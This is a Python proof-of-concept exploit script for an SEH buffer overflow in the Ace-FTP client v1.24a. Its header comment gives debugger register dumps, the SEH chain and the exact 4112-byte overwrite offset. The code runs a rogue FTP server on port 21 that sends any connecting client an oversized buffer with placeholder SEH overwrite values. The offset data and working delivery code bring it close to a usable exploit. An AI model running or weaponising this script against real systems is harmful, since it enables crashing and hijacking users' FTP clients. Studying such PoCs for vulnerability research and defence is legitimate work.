#!/usr/bin/python ####################################################################### #Credit to n00b for finding the bug. #Ace-Ftp client buffer over flow p0c. #This is possible to exploit as we #Smash the seh handlers and there are #Plenty of registers that had our buffer #Im still new to seh over writes I haven't #Had much experience with the seh over write #But get the Idea from what I've read about #It..Any way this script creates a listening #Socket and act's as a ftp server then when the #Client connect's a huge buffer is sent back to #The client.Resulting and a buffer overflow. #If any one feel's like investigating or writing #A poc for this please do so give some credits to #n00b.I will give it a try during the week. ####################################################################### #Shouts: - Str0ke - Marsu - SM - vade79 - c0ntex - Kevin Finisterre ####################################################################### #Tested:Win xp sp2. #Version Affected: v1.24a. ################################################### # \\Debug info// ################################################### #Program received signal SIGSEGV,Segmentation fault. #[Switching to thread 1312.0x714] #0x00403c58 in ?? () # #(gdb) i r # #eax 0x41414141 1094795585 <----Eax over written.. #ecx 0x0 0 #edx 0xa5b464 10859620 #ebx 0x41414141 1094795585 <----Ebx over written.. #esp 0x12e458 0x12e458 #ebp 0x12f48c 0x12f48c #esi 0x12e488 1238152 #edi 0xa5b464 10859620 #eip 0x403c58 0x403c58 #eflags 0x10206 66054 #cs 0x1b 27 #ss 0x23 35 #ds 0x23 35 #es 0x23 35 #fs 0x3b 59 #gs 0x0 0 #fctrl 0xffff1272 -60814 #fstat 0xffff0000 -65536 #ftag 0xffffffff -1 #fiseg 0x0 0 #fioff 0x0 0 #foseg 0xffff0000 -65536 #fooff 0x0 0 ################################################### #What the register look like after crash.. ################################################### #EAX 41414141 #ECX 00000000 #EDX 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA #EBX 41414141 #ESP 0012E458 #EBP 0012F48C ASCII "AAAAAAAAAAAADDDDEEEECCCCCCC #ESI 0012E488 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA #EDI 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA #EIP 00403C58 ################################################### #DS:[41414141]=??? #EDX=00A5D930, (ASCII "AAAAAAAAAAAAAAAAAAAAAAAAA) #MOV EDX,DWORD PTR DS:[EAX] ################################################### #SEH chain of main thread #Address SE handler #--------------------------- #0012E46C AceXFTP.00430B9E #45454545 #--------------------------- #0012F498 44444444 Pointer to next SEH record #0012F49C 45454545 SE handler # #4112byte's to over write Pointer to next SEH record #next 4 bytes over writes se handler. ################################################### from socket import * from struct import pack host = "127.0.0.1 " port = 21 Size_of_buf1 = 4112 Size_of_buf2 = 550 s = socket(AF_INET, SOCK_STREAM) s.bind((host, port)) s.listen(1) print "\nPort %d open Waiting !!!! ..." % port cl, addr = s.accept() print "Vic is connected %s" % addr[0] buf1 = "A" * Size_of_buf1 NEXT_SEH_RECORD = "\x44\x44\x44\x44" SE_HANDLER = "\x45\x45\x45\x45" buf2 = "C" * Size_of_buf2 End = "\r\n" cl.send(buf1 + NEXT_SEH_RECORD + SE_HANDLER + buf2 + End) print "mission accomplished : OK\n" sleep(3) cl.close() s.close()